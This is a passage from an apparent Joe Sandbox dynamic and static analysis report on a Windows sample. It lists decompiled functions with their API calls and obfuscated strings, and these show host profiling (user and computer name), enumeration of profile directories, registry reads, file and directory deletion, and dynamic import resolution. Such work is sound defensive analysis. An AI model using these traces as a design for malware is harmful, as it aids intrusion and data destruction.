Part of subcall function 0041E1E0: GetCurrentThread.KERNEL32 ref: 0041E41F
Part of subcall function 0041E1E0: GetCurrentThread.KERNEL32 ref: 0041E425

Strings

Force Dil Mapping Points succes , xrefs: 0041EA4E
1m, xrefs: 0041E947
s-reason, xrefs: 0041E99B

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 001706F6, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36

APIs

GetSystemWindowsDirectoryA.KERNEL32(?,00000400), ref: 00170712
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000007,00000000,00000000,00000000,00000000), ref: 0017073A

Strings

jjjj, xrefs: 00170723

Memory Dump Source

Source File: 0000000A.00000002.2114485146.00170000.00000040.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_170000_484.jbxd

Function 00423D21, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26

APIs

InitializeCriticalSectionAndSpinCount.KERNELBASE(?,00000FA0), ref: 00423D49

Strings

HfC, xrefs: 00423D27

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 00423D21, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 26

APIs

InitializeCriticalSectionAndSpinCount.KERNELBASE(?,00000FA0), ref: 00423D49

Strings

HfC, xrefs: 00423D27

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 00420BE2, Relevance: 3.1, APIs: 2, Instructions: 90

APIs

_wcslen.LIBCMT ref: 00420C02

Part of subcall function 00424C85: Sleep.KERNEL32(00000000), ref: 00424CAD

_wcslen.LIBCMT ref: 00420C3A

Part of subcall function 00424BCB: HeapFree.KERNEL32(00000000,00000000), ref: 00424BE1
Part of subcall function 00424BCB: GetLastError.KERNEL32(00000000,?,004213EB,00000000,?,0042085F,00000003), ref: 00424BF3

Part of subcall function 00422624: GetCurrentProcess.KERNEL32(C0000417), ref: 0042263A
Part of subcall function 00422624: TerminateProcess.KERNEL32(00000000), ref: 00422641

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 0017020E, Relevance: 3.1, APIs: 2, Instructions: 51

APIs

LoadLibraryA.KERNEL32(?), ref: 0017022E
GetProcAddress.KERNEL32(?,?), ref: 00170269

Memory Dump Source

Source File: 0000000A.00000002.2114485146.00170000.00000040.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_170000_484.jbxd

Function 0042BBE2, Relevance: 1.6, APIs: 1, Instructions: 52

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00424C9B,00000000,?,00000000,00000000,00000000,?,004213AC,00000001,00000214,?,00000000), ref: 0042BC25

Part of subcall function 004246EF: DecodePointer.KERNEL32(?,0042BC3E,?,00000000,?,00424C9B,00000000,?,00000000,00000000,00000000,?,004213AC,00000001,00000214), ref: 004246FA

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 0042BBE2, Relevance: 1.6, APIs: 1, Instructions: 52

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 0042BC25

Part of subcall function 004246EF: RtlDecodePointer.NTDLL ref: 004246FA

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 00421738, Relevance: 1.5, APIs: 1, Instructions: 10

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,0041F2BA), ref: 00421741

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Function 0017029C, Relevance: 1.5, APIs: 1, Instructions: 7

APIs

TerminateProcess.KERNELBASE(000000FF,?), ref: 001702A8

Memory Dump Source

Source File: 0000000A.00000002.2114485146.00170000.00000040.sdmp, Offset: 00170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_170000_484.jbxd

Function 00424C85, Relevance: 1.3, APIs: 1, Instructions: 30

APIs

Part of subcall function 0042BBE2: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00424C9B,00000000,?,00000000,00000000,00000000,?,004213AC,00000001,00000214,?,00000000), ref: 0042BC25

Sleep.KERNEL32(00000000), ref: 00424CAD

Memory Dump Source

Source File: 0000000A.00000001.2041162284.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000001.2041151154.00400000.00000002.sdmp
Associated: 0000000A.00000001.2041182196.00431000.00000004.sdmp
Associated: 0000000A.00000001.2041190556.00434000.00000008.sdmp
Associated: 0000000A.00000001.2041199235.00435000.00000004.sdmp
Associated: 0000000A.00000001.2041209055.00437000.00000008.sdmp
Associated: 0000000A.00000001.2041223999.00438000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_1_400000_484.jbxd

Function 00424C85, Relevance: 1.3, APIs: 1, Instructions: 30

APIs

Part of subcall function 0042BBE2: RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 0042BC25

Sleep.KERNEL32(00000000), ref: 00424CAD

Memory Dump Source

Source File: 0000000A.00000002.2114644836.0041F000.00000020.sdmp, Offset: 0041F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_41f000_484.jbxd

Non-executed Functions

Function 0040A98B, Relevance: 237.3, APIs: 123, Strings: 12, Instructions: 1021

APIs

Part of subcall function 0040A7D8: GetProcessHeap.KERNEL32(00000008,0000000C,?,7142434B,001CFDA8), ref: 0040A845
Part of subcall function 0040A7D8: HeapAlloc.KERNEL32(00000000), ref: 0040A84C
Part of subcall function 0040A7D8: GetMessageExtraInfo.USER32 ref: 0040A868
Part of subcall function 0040A7D8: GetProcessHeap.KERNEL32(00000008,00000016), ref: 0040A8CF
Part of subcall function 0040A7D8: HeapAlloc.KERNEL32(00000000), ref: 0040A8D6
Part of subcall function 0040A7D8: GetDoubleClickTime.USER32 ref: 0040A8EA
Part of subcall function 0040A7D8: LoadLibraryA.KERNEL32(?), ref: 0040A914
Part of subcall function 0040A7D8: GetProcAddress.KERNEL32(00000000), ref: 0040A91B
Part of subcall function 0040A7D8: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040A94F
Part of subcall function 0040A7D8: HeapFree.KERNEL32(00000000), ref: 0040A95C
Part of subcall function 0040A7D8: GetProcessHeap.KERNEL32(00000000,?), ref: 0040A961
Part of subcall function 0040A7D8: HeapFree.KERNEL32(00000000), ref: 0040A968

GetProcessHeap.KERNEL32(00000008,0000000D,?,7142434B,001CFDA8), ref: 0040A9CF
HeapAlloc.KERNEL32(00000000), ref: 0040A9D2
GetCapture.USER32 ref: 0040A9F3
GetModuleHandleA.KERNEL32(00000000), ref: 0040AA19
GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0040AA54
HeapAlloc.KERNEL32(00000000), ref: 0040AA57
GetOpenClipboardWindow.USER32 ref: 0040AA75
GetModuleHandleA.KERNEL32(00000000), ref: 0040AA9B
GetUserNameA.ADVAPI32(0041CDF0,?), ref: 0040AAC6
GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0040AAF9
HeapAlloc.KERNEL32(00000000), ref: 0040AAFC
GetClipboardViewer.USER32 ref: 0040AB16
lstrcmpA.KERNEL32(0041CDF0,00000000), ref: 0040AB41
GetProcessHeap.KERNEL32(00000008,00000009), ref: 0040AB78
HeapAlloc.KERNEL32(00000000), ref: 0040AB7B
GetFocus.USER32 ref: 0040AB95
lstrcmpA.KERNEL32(0041CDF0,00000000), ref: 0040ABC1
GetComputerNameA.KERNEL32(0041CDF0,00000400), ref: 0040ABE8
GetProcessHeap.KERNEL32(00000008,00000009), ref: 0040AC16
HeapAlloc.KERNEL32(00000000), ref: 0040AC19
GetCursor.USER32 ref: 0040AC30
lstrcmpA.KERNEL32(0041CDF0,00000000), ref: 0040AC5B
GetProcessHeap.KERNEL32(00000008,00000009), ref: 0040AC8D
HeapAlloc.KERNEL32(00000000), ref: 0040AC90
GetMenuCheckMarkDimensions.USER32 ref: 0040ACA7
lstrcmpA.KERNEL32(0041CDF0,00000000), ref: 0040ACD2
GetProcessHeap.KERNEL32(00000008,0000001D), ref: 0040AD36
HeapAlloc.KERNEL32(00000000), ref: 0040AD39
GetMessageExtraInfo.USER32 ref: 0040AD53
GetProcessHeap.KERNEL32(00000008,00000013), ref: 0040ADB1
HeapAlloc.KERNEL32(00000000), ref: 0040ADB4
GetClipboardOwner.USER32 ref: 0040ADCE

Part of subcall function 0040A77C: RegCreateKeyA.ADVAPI32(80000002,?,?), ref: 0040A795
Part of subcall function 0040A77C: RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000001,0041CDF0,?), ref: 0040A7BF
Part of subcall function 0040A77C: RegCloseKey.ADVAPI32(?), ref: 0040A7C8

GetProcessHeap.KERNEL32(00000008,00000006), ref: 0040AE2F
HeapAlloc.KERNEL32(00000000), ref: 0040AE32
GetLastError.KERNEL32 ref: 0040AE4F
GetProcessHeap.KERNEL32(00000008,00000007), ref: 0040AE98
HeapAlloc.KERNEL32(00000000), ref: 0040AE9B
CountClipboardFormats.USER32 ref: 0040AEB8
GetProcessHeap.KERNEL32(00000008,00000006), ref: 0040AEFE
HeapAlloc.KERNEL32(00000000), ref: 0040AF01
GetFocus.USER32 ref: 0040AF1E
GetProcessHeap.KERNEL32(00000008,00000006), ref: 0040AF69
HeapAlloc.KERNEL32(00000000), ref: 0040AF6C
GetMessageExtraInfo.USER32 ref: 0040AF89
GetProcessHeap.KERNEL32(00000008,00000006), ref: 0040AFD4
HeapAlloc.KERNEL32(00000000), ref: 0040AFD7
GetForegroundWindow.USER32 ref: 0040AFF4
GetProcessHeap.KERNEL32(00000008,00000012), ref: 0040B052
HeapAlloc.KERNEL32(00000000), ref: 0040B055
GetProcessWindowStation.USER32 ref: 0040B072
GetProcessHeap.KERNEL32(00000008,00000008), ref: 0040B0BD
HeapAlloc.KERNEL32(00000000), ref: 0040B0C0
GetModuleHandleW.KERNEL32(00000000), ref: 0040B0DC
GetProcessHeap.KERNEL32(00000008,00000006), ref: 0040B125
HeapAlloc.KERNEL32(00000000), ref: 0040B128
GetCapture.USER32 ref: 0040B13F
StrStrA.SHLWAPI(0041CDF0,00000000), ref: 0040B1CD
GetProcessHeap.KERNEL32(00000008,00000012), ref: 0040B213
HeapAlloc.KERNEL32(00000000), ref: 0040B216
IsSystemResumeAutomatic.KERNEL32 ref: 0040B22D
GetProcessHeap.KERNEL32(00000008,0000000C), ref: 0040B29D
HeapAlloc.KERNEL32(00000000), ref: 0040B2A0
GetCurrentThreadId.KERNEL32 ref: 0040B2B7
StrStrA.SHLWAPI(0041CDF0,00000000), ref: 0040B2E2
GetProcessHeap.KERNEL32(00000008,0000002B), ref: 0040B363
HeapAlloc.KERNEL32(00000000), ref: 0040B366
GetClipboardSequenceNumber.USER32 ref: 0040B380
GetProcessHeap.KERNEL32(00000008,00000019), ref: 0040B40D
HeapAlloc.KERNEL32(00000000), ref: 0040B410
ReleaseCapture.USER32 ref: 0040B427
StrStrA.SHLWAPI(0041CDF0,00000000), ref: 0040B452
GetProcessHeap.KERNEL32(00000008,00000019), ref: 0040B4B4
HeapAlloc.KERNEL32(00000000), ref: 0040B4B7
GetProcessWindowStation.USER32 ref: 0040B4CE
StrStrA.SHLWAPI(0041CDF0,00000000), ref: 0040B4F9
GetProcessHeap.KERNEL32(00000008,00000019), ref: 0040B552
HeapAlloc.KERNEL32(00000000), ref: 0040B555
GetMenuCheckMarkDimensions.USER32 ref: 0040B569
StrStrA.SHLWAPI(0041CDF0,00000000), ref: 0040B594

Part of subcall function 0040A973: Sleep.KERNEL32(00002710), ref: 0040A97A
Part of subcall function 0040A973: GetTickCount.KERNEL32(0040B5AC), ref: 0040A980

GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040B5AF
HeapFree.KERNEL32(00000000), ref: 0040B5B8
GetProcessHeap.KERNEL32(00000000,00000005), ref: 0040B5BD
HeapFree.KERNEL32(00000000), ref: 0040B5C0
GetProcessHeap.KERNEL32(00000000,706B7358), ref: 0040B5C7
HeapFree.KERNEL32(00000000), ref: 0040B5CA
GetProcessHeap.KERNEL32(00000000,?), ref: 0040B5D4
HeapFree.KERNEL32(00000000), ref: 0040B5D7
GetProcessHeap.KERNEL32(00000000,39635538), ref: 0040B5DE
HeapFree.KERNEL32(00000000), ref: 0040B5E1
GetProcessHeap.KERNEL32(00000000,7D0C1C30), ref: 0040B5E8
HeapFree.KERNEL32(00000000), ref: 0040B5EB
GetProcessHeap.KERNEL32(00000000,48496F7A), ref: 0040B5F2
HeapFree.KERNEL32(00000000), ref: 0040B5F5
GetProcessHeap.KERNEL32(00000000,?), ref: 0040B5FF
HeapFree.KERNEL32(00000000), ref: 0040B602
GetProcessHeap.KERNEL32(00000000,?), ref: 0040B60C
HeapFree.KERNEL32(00000000), ref: 0040B60F
GetProcessHeap.KERNEL32(00000000,?), ref: 0040B619
HeapFree.KERNEL32(00000000), ref: 0040B61C
GetProcessHeap.KERNEL32(00000000,?), ref: 0040B626
HeapFree.KERNEL32(00000000), ref: 0040B629
GetProcessHeap.KERNEL32(00000000,?), ref: 0040B633
HeapFree.KERNEL32(00000000), ref: 0040B636
GetProcessHeap.KERNEL32(00000000,?), ref: 0040B640
HeapFree.KERNEL32(00000000), ref: 0040B643
GetProcessHeap.KERNEL32(00000000,?), ref: 0040B64D
HeapFree.KERNEL32(00000000), ref: 0040B650
GetProcessHeap.KERNEL32(00000000,?), ref: 0040B657
HeapFree.KERNEL32(00000000), ref: 0040B65A
GetProcessHeap.KERNEL32(00000000,?), ref: 0040B664
HeapFree.KERNEL32(00000000), ref: 0040B667
GetProcessHeap.KERNEL32(00000000,371D0123), ref: 0040B66E
HeapFree.KERNEL32(00000000), ref: 0040B671
GetProcessHeap.KERNEL32(00000000,4F1D1F21), ref: 0040B678
HeapFree.KERNEL32(00000000), ref: 0040B67B
GetProcessHeap.KERNEL32(00000000,63784E47), ref: 0040B682
HeapFree.KERNEL32(00000000), ref: 0040B685
GetProcessHeap.KERNEL32(00000000,?), ref: 0040B68F
HeapFree.KERNEL32(00000000), ref: 0040B692
GetProcessHeap.KERNEL32(00000000,77584575), ref: 0040B699
HeapFree.KERNEL32(00000000), ref: 0040B69C
GetProcessHeap.KERNEL32(00000000,?), ref: 0040B6A6
HeapFree.KERNEL32(00000000), ref: 0040B6A9

Strings

GNxc, xrefs: 0040AAEE
yw0Q, xrefs: 0040B545
6.>), xrefs: 0040AB5A
;;6(, xrefs: 0040B280
7g2y, xrefs: 0040AEF3
KNd, xrefs: 0040B52A
zoIH, xrefs: 0040B0B2
g]5, xrefs: 0040B3FB
Xskp, xrefs: 0040B358
8Uc9, xrefs: 0040B208
{*%/, xrefs: 0040B025
uEXw, xrefs: 0040A9C4

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 004022E6, Relevance: 140.4, APIs: 51, Strings: 29, Instructions: 448

APIs

GetProfilesDirectoryW.USERENV(00000000,?), ref: 0040230B
GetProcessHeap.KERNEL32(00000008,?), ref: 00402329
HeapAlloc.KERNEL32(00000000), ref: 0040232C
GetProcessHeap.KERNEL32(00000008,?), ref: 0040233F
HeapAlloc.KERNEL32(00000000), ref: 00402342
GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040235A
HeapAlloc.KERNEL32(00000000), ref: 0040235D
GetProfilesDirectoryW.USERENV(?,?), ref: 004023A2
GetProcessHeap.KERNEL32(00000008,00000015), ref: 004023E7
HeapAlloc.KERNEL32(00000000), ref: 004023EA
GetOpenClipboardWindow.USER32 ref: 0040240A
FindFirstFileW.KERNEL32(?,?), ref: 00402470
GetProcessHeap.KERNEL32(00000008,00000009), ref: 004024BE
HeapAlloc.KERNEL32(00000000), ref: 004024C1
GetCommandLineA.KERNEL32 ref: 004024DD
GetProcessHeap.KERNEL32(00000008,0000000D), ref: 0040250C
HeapAlloc.KERNEL32(00000000), ref: 0040250F
GetForegroundWindow.USER32 ref: 0040252B
lstrcmpW.KERNEL32(?,?), ref: 00402560
lstrcmpW.KERNEL32(?,00000000), ref: 0040257C
GetProcessHeap.KERNEL32(00000008,00000051), ref: 004025F4
HeapAlloc.KERNEL32(00000000), ref: 004025F7
GetCurrentProcessId.KERNEL32 ref: 00402610
GetProcessHeap.KERNEL32(00000008,0000004D), ref: 004026C7
HeapAlloc.KERNEL32(00000000), ref: 004026CA
GetCurrentProcessId.KERNEL32 ref: 004026E9
GetProcessHeap.KERNEL32(00000008,00000061), ref: 00402788
HeapAlloc.KERNEL32(00000000), ref: 0040278B
GetMenuCheckMarkDimensions.USER32 ref: 004027A4
wsprintfW.USER32 ref: 004027E3
GetFileAttributesW.KERNEL32(?), ref: 004027ED

Part of subcall function 0040E0AE: DeleteFileW.KERNEL32(?,?,00000000,76E6FE8D,00402806), ref: 0040E0C2
Part of subcall function 0040E0AE: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E0DC
Part of subcall function 0040E0AE: HeapFree.KERNEL32(00000000), ref: 0040E0E3

GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402814
HeapFree.KERNEL32(00000000), ref: 0040281D
GetProcessHeap.KERNEL32(00000000,?), ref: 00402839
HeapFree.KERNEL32(00000000), ref: 0040283C
GetProcessHeap.KERNEL32(00000000,?), ref: 00402844
HeapFree.KERNEL32(00000000), ref: 00402847
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402859
HeapFree.KERNEL32(00000000), ref: 0040285C
GetProcessHeap.KERNEL32(00000000,?), ref: 00402866
HeapFree.KERNEL32(00000000), ref: 00402869
FindNextFileW.KERNEL32(?,?), ref: 00402879
FindClose.KERNEL32(00000000), ref: 0040288B
GetProcessHeap.KERNEL32(00000000,?), ref: 0040289A
HeapFree.KERNEL32(00000000), ref: 0040289D
GetProcessHeap.KERNEL32(00000000,?), ref: 004028B1
HeapFree.KERNEL32(00000000), ref: 004028B4
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004028C2
HeapFree.KERNEL32(00000000), ref: 004028C5
GetProcessHeap.KERNEL32(00000000,?), ref: 004028D6
HeapFree.KERNEL32(00000000), ref: 004028D9

Strings

3-K, xrefs: 00402686
}S#1, xrefs: 0040259B
xSYb, xrefs: 004023CD
eGtX, xrefs: 0040273B
1SL1iwXziJXfvzGJXfIebGvy, xrefs: 00402626
0a, xrefs: 004023D4
3 K, xrefs: 00402668
X>9, xrefs: 00402750
IGQX, xrefs: 00402781
=Xe9, xrefs: 00402773
K, xrefs: 004026AD
6Q2K, xrefs: 00402757
K4K0, xrefs: 0040265E
gebG, xrefs: 00402482
}KJG, xrefs: 00402749
K6K%, xrefs: 0040267C
vzGJXfIebGvy, xrefs: 00402521
sb0aVS, xrefs: 00402420
ZG:X, xrefs: 0040275E
3A, xrefs: 004026A4
43, xrefs: 0040264F
IebGvy, xrefs: 004024F3
.9 Q, xrefs: 00402765
3Q5K, xrefs: 0040277A
XziJXfvzGJXfIebGvy, xrefs: 00402541
AKUKD31SL1iwXziJXfvzGJXfIebGvy, xrefs: 004026FF
-KQG, xrefs: 0040276C
K8K4, xrefs: 0040269A
bQ+K, xrefs: 00402734

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 00401E16, Relevance: 115.8, APIs: 48, Strings: 18, Instructions: 350

APIs

GetProcessHeap.KERNEL32(00000008,00000208), ref: 00401E30
HeapAlloc.KERNEL32(00000000), ref: 00401E39
GetProcessHeap.KERNEL32(00000008,00000208), ref: 00401E41
HeapAlloc.KERNEL32(00000000), ref: 00401E44
GetProcessHeap.KERNEL32(00000008,00000208), ref: 00401E4C
HeapAlloc.KERNEL32(00000000), ref: 00401E4F
GetProcessHeap.KERNEL32(00000008,00000051), ref: 00401EB2
HeapAlloc.KERNEL32(00000000), ref: 00401EB5
GetCurrentProcessId.KERNEL32 ref: 00401ECC
GetProcessHeap.KERNEL32(00000008,0000004D), ref: 00401F59
HeapAlloc.KERNEL32(00000000), ref: 00401F5C
GetCurrentProcessId.KERNEL32 ref: 00401F73
GetProfilesDirectoryW.USERENV(?,00000104), ref: 00401FA9
wsprintfW.USER32 ref: 00401FC6
FindFirstFileW.KERNEL32(?,?), ref: 00401FD9
StrCmpW.SHLWAPI(?,004104E4), ref: 00401FF9
StrCmpW.SHLWAPI(?,004104E8), ref: 00402013
StrCpyW.SHLWAPI(?,?), ref: 0040204E
GetProcessHeap.KERNEL32(00000008,0000000D), ref: 00402058
HeapAlloc.KERNEL32(00000000), ref: 0040205B
GetProcessWindowStation.USER32 ref: 00402072
StrCatW.SHLWAPI(?,00000000), ref: 0040209D
GetProcessHeap.KERNEL32(00000008,00000025), ref: 004020D8
HeapAlloc.KERNEL32(00000000), ref: 004020DB
GetDoubleClickTime.USER32 ref: 004020EF
wsprintfW.USER32 ref: 0040212A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402145
HeapFree.KERNEL32(00000000), ref: 0040214E
GetProcessHeap.KERNEL32(00000000,?), ref: 00402156
HeapFree.KERNEL32(00000000), ref: 00402159
FindNextFileW.KERNEL32(00000000,?), ref: 00402179
FindClose.KERNEL32(00000000), ref: 00402184
GetProcessHeap.KERNEL32(00000008,00000049), ref: 004021F2
HeapAlloc.KERNEL32(00000000), ref: 004021F5
GetDialogBaseUnits.USER32 ref: 00402209
ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000104), ref: 00402238

Part of subcall function 0040DDBF: lstrlenW.KERNEL32(?,00000001,00000000,?), ref: 0040DDE5
Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000008,00000208), ref: 0040DDFA
Part of subcall function 0040DDBF: HeapAlloc.KERNEL32(00000000), ref: 0040DDFD
Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000008,?), ref: 0040DE20
Part of subcall function 0040DDBF: HeapAlloc.KERNEL32(00000000), ref: 0040DE23
Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000008,00000250), ref: 0040DE3A
Part of subcall function 0040DDBF: HeapAlloc.KERNEL32(00000000), ref: 0040DE3D
Part of subcall function 0040DDBF: lstrcpyW.KERNEL32(?,00000001), ref: 0040DE55
Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000008,00000009), ref: 0040DE70
Part of subcall function 0040DDBF: HeapAlloc.KERNEL32(00000000), ref: 0040DE73
Part of subcall function 0040DDBF: GetProcessWindowStation.USER32 ref: 0040DE87
Part of subcall function 0040DDBF: lstrcatW.KERNEL32(?,00000000), ref: 0040DEB8
Part of subcall function 0040DDBF: lstrcpyW.KERNEL32(00402247,00000001), ref: 0040DEC4
Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000008,00000015), ref: 0040DEF5
Part of subcall function 0040DDBF: HeapAlloc.KERNEL32(00000000), ref: 0040DEF8
Part of subcall function 0040DDBF: GetOpenClipboardWindow.USER32 ref: 0040DF0C
Part of subcall function 0040DDBF: lstrcatW.KERNEL32(00402247,00000000), ref: 0040DF3D
Part of subcall function 0040DDBF: FindFirstFileW.KERNEL32(00402247,?), ref: 0040DF47
Part of subcall function 0040DDBF: lstrlenW.KERNEL32(79146553), ref: 0040DF7F
Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000000,314C5341), ref: 0040DF9A
Part of subcall function 0040DDBF: HeapFree.KERNEL32(00000000), ref: 0040DF9D
Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000008,00000000), ref: 0040DFAC
Part of subcall function 0040DDBF: HeapAlloc.KERNEL32(00000000), ref: 0040DFAF
Part of subcall function 0040DDBF: lstrcpyW.KERNEL32(00000000,313F5356), ref: 0040DFCA
Part of subcall function 0040DDBF: lstrcatW.KERNEL32(314C5341,?), ref: 0040DFD4
Part of subcall function 0040DDBF: lstrcatW.KERNEL32(314C5341,79146553), ref: 0040DFED
Part of subcall function 0040DDBF: RemoveDirectoryW.KERNEL32(314C5341), ref: 0040E014
Part of subcall function 0040DDBF: DeleteFileW.KERNEL32(314C5341), ref: 0040E01F
Part of subcall function 0040DDBF: FindNextFileW.KERNEL32(sb0aVS,?), ref: 0040E035
Part of subcall function 0040DDBF: GetLastError.KERNEL32 ref: 0040E051
Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040E05D
Part of subcall function 0040DDBF: HeapFree.KERNEL32(00000000), ref: 0040E066
Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000000,?), ref: 0040E06B
Part of subcall function 0040DDBF: HeapFree.KERNEL32(00000000), ref: 0040E06E
Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000000,77043129), ref: 0040E075
Part of subcall function 0040DDBF: HeapFree.KERNEL32(00000000), ref: 0040E078
Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000000,00402247), ref: 0040E082
Part of subcall function 0040DDBF: HeapFree.KERNEL32(00000000), ref: 0040E085
Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000000,?), ref: 0040E091
Part of subcall function 0040DDBF: HeapFree.KERNEL32(00000000), ref: 0040E094
Part of subcall function 0040DDBF: GetProcessHeap.KERNEL32(00000000,?), ref: 0040E0A0
Part of subcall function 0040DDBF: HeapFree.KERNEL32(00000000), ref: 0040E0A3

GetProcessHeap.KERNEL32(00000000,?), ref: 00402253
HeapFree.KERNEL32(00000000), ref: 0040225C
GetProcessHeap.KERNEL32(00000000,?), ref: 00402263
HeapFree.KERNEL32(00000000), ref: 00402266
GetProcessHeap.KERNEL32(00000000,?), ref: 0040226D
HeapFree.KERNEL32(00000000), ref: 00402270
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402275
HeapFree.KERNEL32(00000000), ref: 00402278
GetProcessHeap.KERNEL32(00000000,?), ref: 00402280
HeapFree.KERNEL32(00000000), ref: 00402283
GetProcessHeap.KERNEL32(00000000,?), ref: 0040228E
HeapFree.KERNEL32(00000000), ref: 00402291

Strings

wPS, xrefs: 00401E66
AKUKD3, xrefs: 00401EE2
%s\*, xrefs: 00401FBE
e7yr, xrefs: 004021DA
e3yW, xrefs: 004021C5
bS)1, xrefs: 00401E74
ph, xrefs: 0040202C
43, xrefs: 00401F05
Fvnw, xrefs: 004020BE
K8K4, xrefs: 00401F3B
3 K, xrefs: 00401F18
K4K0, xrefs: 00401F11
*2R0, xrefs: 004020B7
}S#1, xrefs: 00401E5F
I, xrefs: 004021E1
bImnph2w05v, xrefs: 00402088
K6K%, xrefs: 00401F26
>IGn, xrefs: 00402025

Memory Dump Source

Source File: 0000000A.00000002.2114634406.00401000.00000040.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.2114624637.00400000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_484.jbxd

Function 0040C055, Relevance: 98.3, APIs: 36, Strings: 20, Instructions: 327

APIs

GetProcessHeap.KERNEL32(00000008,0000000E), ref: 0040C0CB
HeapAlloc.KERNEL32(00000000), ref: 0040C0CE
IsSystemResumeAutomatic.KERNEL32 ref: 0040C0FA
GetProcessHeap.KERNEL32(00000008,00000015), ref: 0040C162
HeapAlloc.KERNEL32(00000000), ref: 0040C165
GetClipboardSequenceNumber.USER32 ref: 0040C18A
GetModuleHandleA.KERNEL32(?,00000000), ref: 0040C1C0
GetProcAddress.KERNEL32(00000000), ref: 0040C1C7
